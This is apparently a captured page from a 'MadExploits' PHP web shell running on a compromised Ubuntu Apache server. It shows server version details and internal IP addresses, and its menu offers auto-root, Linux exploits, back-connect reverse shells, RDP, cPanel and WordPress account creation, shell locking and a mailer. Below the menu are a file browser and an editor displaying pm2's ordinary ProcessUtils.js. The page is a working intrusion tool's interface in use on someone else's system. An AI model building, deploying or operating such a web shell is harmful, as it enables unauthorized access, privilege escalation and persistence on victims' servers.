Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pm2 /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxrwxr-x
God
[ DIR ]
drwxrwxr-x
binaries
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tools
[ DIR ]
drwxrwxr-x
API.js
58.73
KB
-rw-rw-r--
Client.js
19.98
KB
-rw-rw-r--
Common.js
25.65
KB
-rw-rw-r--
Configuration.js
6.4
KB
-rw-rw-r--
Daemon.js
12.6
KB
-rw-rw-r--
Event.js
1.1
KB
-rw-rw-r--
God.js
17.56
KB
-rw-rw-r--
HttpInterface.js
2.25
KB
-rw-rw-r--
ProcessContainer.js
8.9
KB
-rw-rw-r--
ProcessContainerFork.js
1.25
KB
-rw-rw-r--
ProcessUtils.js
1.39
KB
-rw-rw-r--
TreeKill.js
2.71
KB
-rw-rw-r--
Utility.js
8.31
KB
-rw-rw-r--
VersionCheck.js
1022
B
-rw-rw-r--
Watcher.js
2.91
KB
-rw-rw-r--
Worker.js
6.09
KB
-rw-rw-r--
completion.js
6.71
KB
-rw-rw-r--
completion.sh
1.16
KB
-rw-rw-r--
motd
1.22
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ProcessUtils.js
'use strict' module.exports = { injectModules: function() { if (process.env.pmx !== 'false') { const pmx = require('@pm2/io') let conf = {} const hasSpecificConfig = typeof process.env.io === 'string' || process.env.trace === 'true' // pmx is already init, no need to do it twice if (hasSpecificConfig === false) return if (process.env.io) { const io = JSON.parse(process.env.io) conf = io.conf ? io.conf : conf } pmx.init(Object.assign({ tracing: process.env.trace === 'true' || false }, conf)) } }, isESModule(exec_path) { var fs = require('fs') var path = require('path') var semver = require('semver') var data var findPackageJson = function(directory) { var file = path.join(directory, 'package.json') if (fs.existsSync(file) && fs.statSync(file).isFile()) { return file; } var parent = path.resolve(directory, '..') if (parent === directory) { return null; } return findPackageJson(parent) } if (semver.satisfies(process.version, '< 13.3.0')) return false if (path.extname(exec_path) === '.mjs') return true try { data = JSON.parse(fs.readFileSync(findPackageJson(path.dirname(exec_path)))) if (data.type === 'module') return true else return false } catch(e) { } } }
Close